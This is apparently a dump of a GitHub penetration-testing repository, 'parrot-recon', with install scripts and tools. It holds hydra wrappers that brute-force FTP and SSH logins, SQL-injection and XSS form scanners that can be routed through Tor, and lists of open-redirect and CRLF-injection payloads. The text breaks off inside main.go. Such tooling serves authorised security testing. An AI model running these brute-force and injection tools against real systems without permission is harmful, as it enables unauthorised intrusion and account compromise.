├── wordlists └── api-wordlist.txt ├── parrot-recon.png ├── tools ├── go.mod ├── go.sum ├── dork.sh ├── hydra.sh ├── sql.py ├── xssi.py ├── utils.py ├── main.go ├── Injectus.py ├── sqli.pl ├── shcheck.py ├── cors_scanner.py └── jwt_tool.py ├── webdav └── webdav.py ├── README.md ├── install-debian.sh ├── install-archlinux.sh └── parrot-recon.sh /wordlists/api-wordlist.txt: -------------------------------------------------------------------------------- 1 | admin 2 | users 3 | 1 4 | 2 5 | 3 6 | 4 7 | 5 8 | -------------------------------------------------------------------------------- /parrot-recon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/parrotassassin15/parrot-recon/HEAD/parrot-recon.png -------------------------------------------------------------------------------- /tools/go.mod: -------------------------------------------------------------------------------- 1 | module main 2 | 3 | go 1.17 4 | 5 | require github.com/bndr/gotabulate v1.1.2 // indirect 6 | -------------------------------------------------------------------------------- /tools/go.sum: -------------------------------------------------------------------------------- 1 | github.com/bndr/gotabulate v1.1.2 h1:yC9izuZEphojb9r+KYL4W9IJKO/ceIO8HDwxMA24U4c= 2 | github.com/bndr/gotabulate v1.1.2/go.mod h1:0+8yUgaPTtLRTjf49E8oju7ojpU11YmXyvq1LbPAb3U= 3 | -------------------------------------------------------------------------------- /webdav/webdav.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # beta webdav handler 4 | # dev: parrotassassin15 5 | 6 | 7 | # imports 8 | from time import sleep as delay 9 | from os import system as s 10 | 11 | 12 | global host 13 | host = "http://127.0.0.1:8098" 14 | 15 | def main(): 16 | s("sudo service wsgidav start") 17 | print("Please wait...") 18 | for x in reversed(range(1,4)): 19 | print(x) 20 | delay(2) 21 | print("web dav server started. visit " + host) 22 | 23 | main() 24 | -------------------------------------------------------------------------------- /tools/dork.sh: -------------------------------------------------------------------------------- 1 | echo -e "[~] Targeting Domain -> $domain" 2 | FILES=("item_id=15") 3 | for ELEMENT in ${FILES[@]} 4 | do 5 | echo -e "[~] Fixed URL -> $domain $FILES" 6 | echo -e "[!] Trying Payload ${FILES}" 7 | URL="http://google.com/search?hl=en&safe=off&q=" 8 | STRING=`echo $domain | sed 's/ /%20/g'` 9 | URI="$URL%22$domain%22" 10 | lynx -dump $URI > gone.tmp 11 | sed 's/http/\^http/g' gone.tmp | tr -s "^" "\n" | grep http| sed 's/\ .*//g' > gtwo.tmp 12 | rm gone.tmp 13 | sed '/google.com/d' gtwo.tmp > urls 14 | rm gtwo.tmp 15 | echo "SExtraction -> Extracted `wc -l urls` and listed them in '`pwd`/urls' file for reference." 16 | echo "" 17 | cat urls 18 | done 19 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Parrots Recon ( A Recon Automation Script Beta V2 ) 2 | 3 | install: 4 | ``` 5 | git clone https://github.com/parrotassassin15/parrot-recon.git 6 | ``` 7 | 8 | ``` 9 | sudo chmod +x install-{platform}.sh ; sudo ./install-{platform}.sh 10 | ``` 11 | 12 | run: 13 | ``` 14 | sudo ./parrot-recon.sh -d -t -w 15 | ``` 16 | 17 |
18 | 19 | # Current Release Support 20 | - Web Enumerataion 21 | - Vulnerability Scans 22 | - API Enumeration 23 | 24 | # New Releases Coming Soon 25 | - Sends Email with Mailgun 26 | - Opens Local Web Server for Results 27 | 28 |
29 | 30 | Preview : 31 | 32 |
33 | 34 | 35 | -------------------------------------------------------------------------------- /tools/hydra.sh: -------------------------------------------------------------------------------- 1 | domain=$1 2 | results=$2 3 | ssh=$(cat $results | grep ssh | cut -b 15,16,17) 4 | ftp=$(cat $results | grep ftp | cut -b 15,16,17) 5 | 6 | 7 | function dict { 8 | read -p "Enter Dictionary List: " wordlist 9 | 10 | } 11 | 12 | if [ $ftp !=0 ] 13 | then 14 | echo "[+] FTP Service Found!" 15 | while true 16 | do 17 | read -p "Do You Want To Bruteforce FTP? " answer 18 | case $answer in 19 | [Yy]* ) dict; hydra -L $wordlist -P $wordlist $domain ftp; break;; 20 | [Nn]* ) break;; 21 | * ) echo "Please Answer yes or no.";; 22 | esac 23 | done 24 | else 25 | exit 0 26 | fi 27 | 28 | if [ $ssh !=0 ] 29 | then 30 | echo "[+] SSH Service Found!" 31 | while true 32 | do 33 | read -p "Do You Want To Bruteforce SSH? " answer 34 | case $answer in 35 | [Yy]* ) dict; hydra -L $wordlist -P $wordlist $domain ssh; break;; 36 | [Nn]* ) break;; 37 | * ) echo "Please Answer yes or no.";; 38 | esac 39 | done 40 | else 41 | exit 0 42 | fi -------------------------------------------------------------------------------- /tools/sql.py: -------------------------------------------------------------------------------- 1 | import os, sys, requests, colorama, subprocess 2 | import time as t 3 | from bs4 import BeautifulSoup as bs 4 | from urllib.parse import urljoin 5 | from pprint import pprint 6 | from colorama import Fore, Back, Style 7 | 8 | def CS(X): 9 | t.sleep(X) 10 | subprocess.call("clear") 11 | 12 | 13 | 14 | s = requests.Session() 15 | s.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36" 16 | 17 | 18 | def get_all_forms(url): 19 | soup = bs(s.get(url).content, "html.parser") 20 | return soup.find_all("form") 21 | 22 | 23 | def get_form_details(form): 24 | details = {} 25 | try: 26 | action = form.attrs.get("action").lower() 27 | except: 28 | action = None 29 | method = form.attrs.get("method", "get").lower() 30 | inputs = [] 31 | for input_tag in form.find_all("input"): 32 | input_type = input_tag.attrs.get("type", "text") 33 | input_name = input_tag.attrs.get("name") 34 | input_value = input_tag.attrs.get("value", "") 35 | inputs.append({"type": input_type, "name": input_name, "value": input_value}) 36 | details["action"] = action 37 | details["method"] = method 38 | details["inputs"] = inputs 39 | return details 40 | 41 | 42 | def is_vulnerable(response): 43 | errors = { 44 | "you have an error in your sql syntax;", 45 | "warning: mysql", 46 | "unclosed quotation mark after the character string", 47 | "quoted string not properly terminated", 48 | } 49 | for error in errors: 50 | if error in response.content.decode().lower(): 51 | return True 52 | print("[+] Error Given -> " + error) 53 | return False 54 | 55 | 56 | def scan_sql_injection(url): 57 | for c in "\"'": 58 | new_url = f"{url}{c}" 59 | servers = ["MySQL, Oracle, SqLServer"] 60 | for server in servers: 61 | print(Fore.YELLOW+"[!] Supported Servers: " + server) 62 | print("[~] Trying", new_url) 63 | res = s.get(new_url) 64 | if is_vulnerable(res): 65 | print("[+] SQL Vulnerability Detected On -> ", new_url) 66 | return 67 | forms = get_all_forms(url) 68 | print(f"[+] Detected {len(forms)} forms on {url}.") 69 | for form in forms: 70 | form_details = get_form_details(form) 71 | for c in "\"'": 72 | data = {} 73 | for input_tag in form_details["inputs"]: 74 | if input_tag["value"] or input_tag["type"] == "hidden": 75 | try: 76 | data[input_tag["name"]] = input_tag["value"] + c 77 | except: 78 | pass 79 | elif input_tag["type"] != "submit": 80 | data[input_tag["name"]] = f"test{c}" 81 | url = urljoin(url, form_details["action"]) 82 | if form_details["method"] == "post": 83 | res = s.post(url, data=data) 84 | elif form_details["method"] == "get": 85 | res = s.get(url, params=data) 86 | if is_vulnerable(res): 87 | print("[+] SQL Injection vulnerability detected, link:", url) 88 | print("[+] Form:") 89 | print(form_details) 90 | break 91 | 92 | if __name__ == "__main__": 93 | url = sys.argv[0] 94 | #url = str(input(" target URL -> ")) 95 | scan_sql_injection(url) -------------------------------------------------------------------------------- /install-debian.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # banner 4 | cat << "EOF" 5 | ____ ____ _______________ / /______ ________ _________ ____ 6 | / __ \/ __ `/ ___/ ___/ __ \/ __/ ___/ / ___/ _ \/ ___/ __ \/ __ \ 7 | / /_/ / /_/ / / / / / /_/ / /_(__ ) / / / __/ /__/ /_/ / / / / 8 | / .___/\__,_/_/ /_/ \____/\__/____/ /_/ \___/\___/\____/_/ /_/ 9 | /_/ 10 | _ __ ____ 11 | (_)___ _____/ /_____ _/ / /__ _____ 12 | / / __ \/ ___/ __/ __ `/ / / _ \/ ___/ 13 | / / / / (__ ) /_/ /_/ / / / __/ / 14 | /_/_/ /_/____/\__/\__,_/_/_/\___/_/ 15 | 16 | 17 | 18 | /.\ 19 | | \ 20 | / \ 21 | // / 22 | |/ /\__________________________________________________ 23 | / / 24 | / / 25 | \/ 26 | EOF 27 | 28 | 29 | # sets up enviornment variables and terminal colors 30 | red=`tput setaf 1` 31 | green=`tput setaf 2` 32 | white=`tput setaf 7` 33 | working_dir=$(cd -P -- "$(dirname -- "$0")" && pwd -P) 34 | tools_dir=$working_dir/tools/ 35 | 36 | #makes sure the user is running as root 37 | if [ `whoami` != "root" ] 38 | then 39 | echo "[!] This Script Needs To Be Run As Root User" 40 | exit 0 41 | fi 42 | 43 | # starts the install of parrot recon tools and prints status 44 | echo "$green[+] Installing Tools Required For Parrot-Recon$white" 45 | 46 | echo "$red[+] installing Apt Packages For Parrot-Recon$white" 47 | sudo apt install nmap hydra nikto amass dirsearch ffuf dirbuster sslyze sublist3r wpscan wafw00f -y 48 | sudo apt install golang-go -y 49 | sudo apt install golang -y 50 | sudo apt install lynx -y 51 | 52 | echo "$red[+] Installing Golang Tools For Parrot-Recon$white" 53 | go install -v github.com/lukasikic/subzy@latest 54 | go mod tidy; go mod init main; go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 55 | go get github.com/bndr/gotabulate 56 | go get github.com/bndr/gotabulate 57 | 58 | 59 | # do not fuck with this it works dont mess with it parrot i swear 60 | echo "$red[+] Cloning Git Repos For Parrot-Recon$white" 61 | git clone https://github.com/Dionach/CMSmap $tools_dir/CMSmap 62 | git clone https://github.com/mlcsec/headi $tools_dir/headi 63 | git clone https://github.com/BountyStrike/Injectus $tools_dir/Injectus 64 | git clone https://github.com/chrispetrou/FDsploit $tools_dir/FDsploit 65 | git clone https://github.com/0xInfection/XSRFProbe $tools_dir/XSRFProbe 66 | git clone https://github.com/ticarpi/jwt_tool.git $tools_dir/jwt_tool 67 | 68 | 69 | # functions to make sure the tools are in the right place for parrot recon 70 | echo "$red[+] Running Functions To Put Tools In The Right Directory$white" 71 | 72 | cmsmap() { 73 | cd $tools_dir/CMSmap 74 | sudo python3 setup.py install 75 | } 76 | 77 | cmsmap 78 | 79 | headi() { 80 | cd $tools_dir/headi/ 81 | go build main.go 82 | sudo cp main /bin/headi 83 | } 84 | 85 | headi 86 | 87 | injectus() { 88 | cd $tools_dir/Injectus/ 89 | pip3 install -r requirements.txt 90 | cp *.py $tools_dir 91 | } 92 | 93 | injectus 94 | 95 | fdsploit() { 96 | cd $tools_dir/FDsploit 97 | cp fdploit.py ../ 98 | pip3 install -r requirements.txt 99 | } 100 | 101 | fdsploit 102 | 103 | 104 | xsrfprobe() { 105 | cd $tools_dir/XSRFProbe 106 | sudo python3 setup.py install 107 | } 108 | 109 | xsrfprobe 110 | 111 | jwt_tool() { 112 | echo "$red[!] JWT is not gonna be installed" 113 | 114 | } 115 | 116 | jwt_tool 117 | 118 | 119 | # read -p "Enter Password for webdav access" pass 120 | # read -e 121 | 122 | # needs to be set up properly 123 | echo "$red[+] Setting up webDAV portion" 124 | sudo cp webdav/wsgidav.service /etc/systemd/system/wsgidav.service 125 | 126 | 127 | 128 | echo "$green[+] Script Done!" 129 | echo "$green[+] You are Ready To Use Parrot-Recon!" 130 | -------------------------------------------------------------------------------- /tools/xssi.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from pprint import pprint 3 | from bs4 import BeautifulSoup as bs 4 | from urllib.parse import urljoin 5 | import colorama 6 | import time as t 7 | from colorama import Fore, Back, Style, init 8 | import datetime 9 | import sys 10 | from datetime import datetime 11 | 12 | init() 13 | 14 | def xss(): 15 | 16 | def get_all_forms(url): 17 | soup = bs(requests.get(url).content, "html.parser") 18 | return soup.find_all("form") 19 | 20 | 21 | def get_form_details(form): 22 | details = {} 23 | action = form.attrs.get("action").lower() 24 | method = form.attrs.get("method", "get").lower() 25 | inputs = [] 26 | for input_tag in form.find_all("input"): 27 | input_type = input_tag.attrs.get("type", "text") 28 | input_name = input_tag.attrs.get("name") 29 | inputs.append({"type": input_type, "name": input_name}) 30 | details["action"] = action 31 | details["method"] = method 32 | details["inputs"] = inputs 33 | return details 34 | 35 | 36 | def submit_form(form_details, url, value): 37 | target_url = urljoin(url, form_details["action"]) 38 | inputs = form_details["inputs"] 39 | data = {} 40 | for input in inputs: 41 | if input["type"] == "text" or input["type"] == "search": 42 | input["value"] = value 43 | input_name = input.get("name") 44 | input_value = input.get("value") 45 | if input_name and input_value: 46 | data[input_name] = input_value 47 | 48 | if form_details["method"] == "post": 49 | return requests.post(target_url, data=data) 50 | else: 51 | return requests.get(target_url, params=data) 52 | 53 | 54 | def scan_xss(url): 55 | print("\x1b[H\x1b[2J\x1b[3J") 56 | sc = "defualtxss.txt" 57 | print(Fore.RED+"----------------------------------------------") 58 | print(Fore.RED+f"\033[35m[\033[36m+\033[35m] Utilizing Defualt xss script -> {sc}") 59 | print(Fore.RED+f"\033[35m[\033[36m+\033[35m] Targeting URL -> {url}") 60 | print(Fore.RED+f"\033[35m[\033[36m+\033[35m] Time Started -> " + str(datetime.now())) 61 | t.sleep(2) 62 | file2 = open('defualtxss.txt', 'r') 63 | l1 = file2.readlines() 64 | count = -0 65 | for line in l1: 66 | print(Fore.YELLOW+"[-] Payload {} -> {}".format(count, line.strip())) 67 | print("=============== Are you sure you want to continue ==================== ") 68 | y = str(input("\033[31m Y/n >>> ")) 69 | if y == 'Y': 70 | print("[+] Script started at -> " + str(datetime.now())) 71 | elif y == 'n': 72 | print("[~] Exiting....") 73 | sys.exit() 74 | else: 75 | print("[-] Not an option...") 76 | sys.exit() 77 | while True: 78 | file = open('defualtxss.txt', 'r') 79 | l = file.readlines() 80 | count =+ 1 81 | for line in l: 82 | print("[~] Testing Payload -> {} : {}".format(count, line.strip())) 83 | forms = get_all_forms(url) 84 | print(f"[+] Detected {len(forms)} forms on {url}.") 85 | js_script = "{}".format(line.strip()) 86 | is_vulnerable = False 87 | for form in forms: 88 | form_details = get_form_details(form) 89 | content = submit_form(form_details, url, js_script).content.decode() 90 | if js_script in content: 91 | print(f"[+] XSS Detected on {url}") # <- place where it was detected 92 | print(f"[*] Form details:") 93 | pprint(form_details) 94 | is_vulnerable = True 95 | return is_vulnerable 96 | 97 | 98 | if __name__ == "__main__": 99 | print("\x1b[H\x1b[2J\x1b[3J") 100 | #https://xss-game.appspot.com/level1/frame 101 | url = str(input(" URL >>> ")) 102 | print(scan_xss(url)) 103 | 104 | if __name__ == "__main__": 105 | xss() -------------------------------------------------------------------------------- /tools/utils.py: -------------------------------------------------------------------------------- 1 | import re 2 | from urllib.parse import urlsplit, urlunsplit 3 | 4 | crlf_payloads = [ 5 | "%0d%0abounty:strike", 6 | "%0abounty:strike", 7 | "%0dbounty:strike", 8 | "%23%0dbounty:strike", 9 | "%3f%0dbounty:strike", 10 | "%250abounty:strike", 11 | "%25250abounty:strike", 12 | "%%0a0abounty:strike", 13 | "%3f%0dbounty:strike", 14 | "%23%0dbounty:strike", 15 | "%25%30abounty:strike", 16 | "%25%30%61bounty:strike", 17 | "%u000abounty:strike", 18 | ] 19 | 20 | openredirect_params = [ 21 | "next", 22 | "url", 23 | "target", 24 | "rurl", 25 | "dest", 26 | "destination", 27 | "redir", 28 | "redirect_uri", 29 | "redirect_url", 30 | "redirect", 31 | "view", 32 | "image_url", 33 | "go", 34 | "return", 35 | "returnTo", 36 | "return_to", 37 | "checkout_url", 38 | "continue", 39 | "return_path", 40 | "to", 41 | "RedirectTo", 42 | "next", 43 | "nextURL", 44 | ] 45 | 46 | openredirect_payloads = [ 47 | "bountystrike.io", 48 | "/bountystrike.io", 49 | "/http://bountystrike.io", 50 | "//bountystrike.io", 51 | "///bountystrike.io", 52 | "////bountystrike.io", 53 | "%2fbountystrike.io", 54 | "%2f$2fbountystrike.io", 55 | "%2fbountystrike.io%2f%2f", 56 | "$2f%2fbountystrike.io%2f%2f", 57 | "%2fbountystrike.io//", 58 | ] 59 | 60 | def build_openredirect_list(url: str): 61 | 62 | query_param_regex = re.compile(r"([\w\-\_]+=[\w\-\.\_]+)") 63 | 64 | u2 = urlsplit(url) 65 | 66 | if u2.query: 67 | re_keys = query_param_regex.findall(u2.query) 68 | keypairs= [] 69 | payload_keypairs = [] 70 | 71 | # Transform param=value to {"key": "param", "value": "param_value"} 72 | # Save all dics to list 73 | for keypair in re_keys: 74 | keypair_split = keypair.split("=") 75 | keypairs.append({"key": keypair_split[0], "value": keypair_split[1]}) 76 | 77 | # Transform the keypair dict to {"key": "param": "value": "payload"} 78 | for op in openredirect_params: 79 | keys = [k["key"] for k in keypairs] 80 | if op in keys: 81 | payload_keypairs.extend([{"key": op, "value": payload} for payload in openredirect_payloads]) 82 | 83 | # Change original params to payload params in the URL 84 | for x in payload_keypairs: 85 | pattern = re.compile(x["key"] + r"=[\w\-\.\_]+&*") 86 | sub, count = re.subn(pattern, f"{x['key']}={x['value']}", url) 87 | if count > 0: 88 | yield {"url": sub, "type": "openredirect", "payload": x['value']} 89 | 90 | 91 | elif u2.path: 92 | path = u2.geturl() 93 | 94 | for op_param in openredirect_params: 95 | pattern = re.compile(fr"{op_param}\/[\w\_\-\.]+\/*") 96 | for p in openredirect_payloads: 97 | sub, count = re.subn(pattern, f"{op_param}/{p}", path) 98 | if count > 0: 99 | yield {"url": sub, "type": "openredirect", "payload": p} 100 | 101 | 102 | else: 103 | # Append payload to end of URL 104 | for payload in openredirect_payloads: 105 | attack = f"{url}/{payload}" 106 | yield {"url": attack, "type": "openredirect", "payload": payload} 107 | 108 | 109 | def build_crlf_list(url: str): 110 | value_regex = re.compile(r"\w=([\w\-\.\_]+)&*") 111 | 112 | f = value_regex.findall(url) 113 | u = urlsplit(url) 114 | attacks= [] 115 | if urlsplit(url).query: 116 | query = urlsplit(url).query 117 | 118 | # sniper 119 | for payload in crlf_payloads: 120 | for p in f: 121 | attacks.append(query.replace(f"={p}", f"={payload}")) 122 | 123 | injected_queries = list(set(attacks)) 124 | for query in injected_queries: 125 | injected_url = urlunsplit(u._replace(query=query)) 126 | yield {"url": injected_url, "type": "crlf"} 127 | 128 | else: 129 | for payload in crlf_payloads: 130 | if not url.endswith("/"): 131 | injected_url = f"{url}/{payload}" 132 | else: 133 | injected_url = f"{url}{payload}" 134 | 135 | yield {"url": injected_url, "type": "crlf"} -------------------------------------------------------------------------------- /install-archlinux.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # banner 4 | cat << "EOF" 5 | ____ ____ _______________ / /______ ________ _________ ____ 6 | / __ \/ __ `/ ___/ ___/ __ \/ __/ ___/ / ___/ _ \/ ___/ __ \/ __ \ 7 | / /_/ / /_/ / / / / / /_/ / /_(__ ) / / / __/ /__/ /_/ / / / / 8 | / .___/\__,_/_/ /_/ \____/\__/____/ /_/ \___/\___/\____/_/ /_/ 9 | /_/ 10 | _ __ ____ 11 | (_)___ _____/ /_____ _/ / /__ _____ 12 | / / __ \/ ___/ __/ __ `/ / / _ \/ ___/ 13 | / / / / (__ ) /_/ /_/ / / / __/ / 14 | /_/_/ /_/____/\__/\__,_/_/_/\___/_/ 15 | 16 | 17 | 18 | /.\ 19 | | \ 20 | / \ 21 | // / 22 | |/ /\__________________________________________________ 23 | / / 24 | / / 25 | \/ 26 | EOF 27 | 28 | 29 | # sets up enviornment variables and terminal colors 30 | red=`tput setaf 1` 31 | green=`tput setaf 2` 32 | white=`tput setaf 7` 33 | working_dir=$(cd -P -- "$(dirname -- "$0")" && pwd -P) 34 | tools_dir=$working_dir/tools/ 35 | 36 | # makes sure the user is running as root 37 | if [ `whoami` != "root" ] 38 | then 39 | echo "[!] This Script Needs To Be Run As Root User" 40 | exit 0 41 | fi 42 | 43 | 44 | # makes sure you have black arch installed if not it installs it 45 | if [ -f /etc/pacman.d/blackarch-mirrorlist ] 46 | then 47 | echo "$green[+] You Are Good To Go No Need To Install The Black Arch Repos " 48 | else 49 | curl -O https://blackarch.org/strap.sh 50 | chmod +x strap.sh 51 | ./strap.sh 52 | fi 53 | 54 | # starts the install of parrot recon tools and prints status 55 | echo "$green[+] Installing Tools Required For Parrot-Recon$white" 56 | 57 | echo "$red[+] Installing Pacman Packages For Parrot-Recon$white" 58 | sudo pacman -S nmap hydra nikto amass dirsearch ffuf dirbuster sslyze sublist3r wpscan wafw00f -y 59 | sudo pacman -S golang-go -y 60 | sudo pacman -S install golang -y 61 | sudo pacman -S lynx -y 62 | sudo pacman -S git 63 | 64 | echo "$red[+] Installing Golang Tools For Parrot-Recon$white" 65 | go install -v github.com/lukasikic/subzy@latest 66 | go mod tidy; go mod init main; go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 67 | go get github.com/bndr/gotabulate 68 | go get github.com/bndr/gotabulate 69 | 70 | 71 | # do not fuck with this it works dont mess with it parrot i swear 72 | echo "$red[+] Cloning Git Repos For Parrot-Recon$white" 73 | git clone https://github.com/Dionach/CMSmap $tools_dir/CMSmap 74 | git clone https://github.com/mlcsec/headi $tools_dir/headi 75 | git clone https://github.com/BountyStrike/Injectus $tools_dir/Injectus 76 | git clone https://github.com/chrispetrou/FDsploit $tools_dir/FDsploit 77 | git clone https://github.com/0xInfection/XSRFProbe $tools_dir/XSRFProbe 78 | git clone https://github.com/ticarpi/jwt_tool.git $tools_dir/jwt_tool 79 | 80 | 81 | # functions to make sure the tools are in the right place for parrot recon 82 | echo "$red[+] Running Functions To Put Tools In The Right Directory$white" 83 | 84 | cmsmap() { 85 | cd $tools_dir/CMSmap 86 | sudo python3 setup.py install 87 | } 88 | 89 | cmsmap 90 | 91 | headi() { 92 | cd $tools_dir/headi/ 93 | go build main.go 94 | sudo cp main /bin/headi 95 | } 96 | 97 | headi 98 | 99 | injectus() { 100 | cd $tools_dir/Injectus/ 101 | pip3 install -r requirements.txt 102 | cp *.py $tools_dir 103 | } 104 | 105 | injectus 106 | 107 | fdsploit() { 108 | cd $tools_dir/FDsploit 109 | cp fdploit.py ../ 110 | pip3 install -r requirements.txt 111 | } 112 | 113 | fdsploit 114 | 115 | 116 | xsrfprobe() { 117 | cd $tools_dir/XSRFProbe 118 | sudo python3 setup.py install 119 | } 120 | 121 | xsrfprobe 122 | 123 | jwt_tool() { 124 | echo "$red[!] JWT is not gonna be installed" 125 | 126 | } 127 | 128 | jwt_tool 129 | 130 | 131 | # read -p "Enter Password for webdav access" pass 132 | # read -e 133 | 134 | # needs to be set up properly 135 | echo "$red[+] Setting up WebDAV portion" 136 | echo "$red[!] Not Ready Yet Check Back Later" 137 | #sudo cp webdav/wsgidav.service /etc/systemd/system/wsgidav.service 138 | 139 | 140 | 141 | echo "$green[+] Script Done!" 142 | echo "$green[+] You are Ready To Use Parrot-Recon!" 143 | -------------------------------------------------------------------------------- /tools/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bufio" 5 | "bytes" 6 | "flag" 7 | "fmt" 8 | "io/ioutil" 9 | "log" 10 | "net/http" 11 | "net/url" 12 | "os" 13 | "os/exec" 14 | "regexp" 15 | "runtime" 16 | "time" 17 | 18 | "github.com/bndr/gotabulate" 19 | ) 20 | 21 | var ( 22 | flagHelp = flag.Bool("h", false, `Print the help menu and exit`) 23 | flagList = flag.String("l", "", `Use a list for SQL Testing`) 24 | flagTor = flag.String("p", "", `Use tor proxies to connect to host`) 25 | flagTarget = flag.String("t", "", `target URL`) 26 | ) 27 | 28 | var Proxy string = "socks5://127.0.0.1:9050" 29 | 30 | func online() { 31 | response, err := http.Get("https://www.google.com") 32 | ch(err) 33 | if response.StatusCode != 200 { 34 | fmt.Println("\033[31m[-] You seem to not be online.....") 35 | fmt.Println("\033[31m[-] Exiting.....") 36 | os.Exit(0) 37 | } else { 38 | fmt.Println("[*] Online test passed.....") 39 | } 40 | } 41 | 42 | // 43 | // 44 | // 45 | // 46 | func tabletest() { 47 | row_1 := []interface{}{"john", 20, "ready"} 48 | 49 | // Create an object from 2D interface array 50 | t := gotabulate.Create([][]interface{}{row_1}) 51 | 52 | // Set the Headers (optional) 53 | t.SetHeaders([]string{*flagTarget}) 54 | t.SetEmptyString("None") 55 | t.SetAlign("center") 56 | fmt.Println(t.Render("grid")) 57 | } 58 | 59 | func listed() { 60 | flag.Parse() 61 | // 62 | // 63 | // 64 | f, err := os.Open(*flagList) 65 | if err != nil { 66 | fmt.Println("[-] Sorry could not parse the list -> ", *flagList) 67 | } 68 | defer f.Close() 69 | scan := bufio.NewScanner(f) 70 | // 71 | for scan.Scan() { 72 | jector := []string{ 73 | scan.Text(), 74 | } 75 | errors := []string{ 76 | "SQL", 77 | "MySQL", 78 | "ORA-", 79 | "syntax", // better verticle 80 | } 81 | 82 | errRegexes := []*regexp.Regexp{} 83 | for _, e := range errors { 84 | re := regexp.MustCompile(fmt.Sprintf(".*%s.*", e)) 85 | errRegexes = append(errRegexes, re) 86 | } 87 | 88 | for _, payload := range jector { 89 | 90 | client := new(http.Client) 91 | body := []byte(fmt.Sprintf("username=%s&password=p", payload)) 92 | 93 | req, err := http.NewRequest( 94 | "POST", 95 | *flagTarget, 96 | bytes.NewReader(body), 97 | ) 98 | 99 | if err != nil { 100 | log.Fatalf("\033[31m\t[!] Unable to generate request: %s\n", err) 101 | } 102 | 103 | req.Header.Add("Content-Type", "application/x-www-form-urlencoded") 104 | resp, err := client.Do(req) 105 | if err != nil { 106 | log.Fatalf("[!] Unable to process response: %s\n", err) 107 | } 108 | 109 | body, err = ioutil.ReadAll(resp.Body) 110 | if err != nil { 111 | log.Fatalf("[!] Unable to read response body: %s\n", err) 112 | } 113 | 114 | resp.Body.Close() // close response 115 | 116 | for idx, re := range errRegexes { 117 | if re.MatchString(string(body)) { 118 | stringerror := "Server is vulnerable" 119 | errormsg := "An error | detected vulnerability" 120 | // fmt.Printf("[+] SQL Error found [Server->%s] for payload: %s\n", errors[idx], payload) 121 | row_1 := []interface{}{errors[idx], payload} 122 | row_2 := []interface{}{errormsg} 123 | t := gotabulate.Create([][]interface{}{row_1, row_2}) 124 | t.SetHeaders([]string{*flagTarget, stringerror}) 125 | t.SetAlign("center") 126 | fmt.Println("\033[37m", t.Render("grid")) 127 | break 128 | //fmt.Printf("[+] SQL Error found [Server->%s] for payload: %s\n", errors[idx], payload) 129 | //break 130 | } 131 | } 132 | } 133 | } 134 | 135 | } 136 | 137 | func torhandel(err error) { 138 | if err != nil { 139 | fmt.Println("Error recived within this block | parsing -> ", Proxy) 140 | log.Fatal(err) 141 | } 142 | } 143 | 144 | func testproxy() { 145 | torProxyUrl, err := url.Parse(Proxy) 146 | 147 | if err != nil { 148 | fmt.Println("[-] Error when running proxy, is tor offline? or not being uses") 149 | os.Exit(0) 150 | } 151 | 152 | torTransport := &http.Transport{Proxy: http.ProxyURL(torProxyUrl)} 153 | client := &http.Client{Transport: torTransport, Timeout: time.Second * 5} 154 | resp, err := client.Get("https://www.google.com") 155 | 156 | if err != nil { 157 | fmt.Println("[-] Error when attempting connection using socket -> ", Proxy) 158 | fmt.Println("[-] Attempted to grab or make a GET request to server => https://www.google.com") 159 | log.Fatal(err) 160 | } 161 | defer resp.Body.Close() 162 | } 163 | 164 | func maintor() { 165 | flag.Parse() 166 | testproxy() 167 | torProxyUrl, err := url.Parse(Proxy) 168 | torhandel(err) 169 | torTransport := &http.Transport{Proxy: http.ProxyURL(torProxyUrl)} 170 | client := &http.Client{Transport: torTransport, Timeout: time.Second * 5} 171 | resp, err := client.Get(*flagTarget) 172 | ch(err) 173 | defer resp.Body.Close() 174 | fmt.Println("[*] Used Sock : ", Proxy) 175 | fmt.Println("[*] Status Code: ", resp.StatusCode) 176 | } 177 | 178 | func ch(err error) { 179 | if err != nil { 180 | log.Fatal(err) 181 | } 182 | } 183 | 184 | func clear() { 185 | if runtime.GOOS == "windows" { 186 | cls, err := exec.Command("cls").Output() 187 | if err != nil { 188 | log.Fatal(err) 189 | } 190 | output := string(cls[:]) 191 | fmt.Println(output) 192 | } 193 | if runtime.GOOS == "linux" { 194 | clear, err := exec.Command("clear").Output() 195 | ch(err) 196 | output := string(clear[:]) 197 | fmt.Println(output) 198 | } 199 | } 200 | 201 | func main() { 202 | flag.Parse() 203 | online() 204 | if *flagHelp { 205 | fmt.Println("\033[32m[*] Usage -> go run main.go -t ") 206 | fmt.Println("\033[32m[X] Extra -> -p true|false -l ") 207 | fmt.Println("\033[32m[X] Advances -> go run main.go -t -p -l | note it must be a main.txt") 208 | fmt.Println("---------------------------------------------------------------------------") 209 | flag.PrintDefaults() 210 | } 211 | if *flagTor == "true" { 212 | testproxy() 213 | maintor() 214 | } 215 | if *flagTor == "false" { 216 | fmt.Println("[*] Not using tor sockets") 217 | } 218 | if *flagList == "main.txt" { 219 | listed() 220 | os.Exit(1) 221 | } 222 | if *flagTarget == "true" { 223 | fmt.Println("[-] Please input a url") 224 | fmt.Println("[-] go run main.go -t http://testphp.vulnweb.com/listproducts.php?cat=1") 225 | os.Exit(1) 226 | } 227 | injections := []string{ 228 | "baseline", 229 | ")", 230 | "(", 231 | "\"", 232 | "'", 233 | } 234 | errors := []string{ 235 | "SQL", 236 | "MySQL", 237 | "ORA-", 238 | "syntax", 239 | } 240 | 241 | errRegexes := []*regexp.Regexp{} 242 | for _, e := range errors { 243 | re := regexp.MustCompile(fmt.Sprintf(".*%s.*", e)) 244 | errRegexes = append(errRegexes, re) 245 | } 246 | 247 | for _, payload := range injections { 248 | client := new(http.Client) 249 | body := []byte(fmt.Sprintf("username=%s&password=p", payload)) 250 | 251 | res, err := http.NewRequest( 252 | "POST", 253 | *flagTarget, 254 | bytes.NewReader(body), 255 | ) 256 | 257 | if err != nil { 258 | log.Fatalf("\033[31m\t[X] Unable to Create request 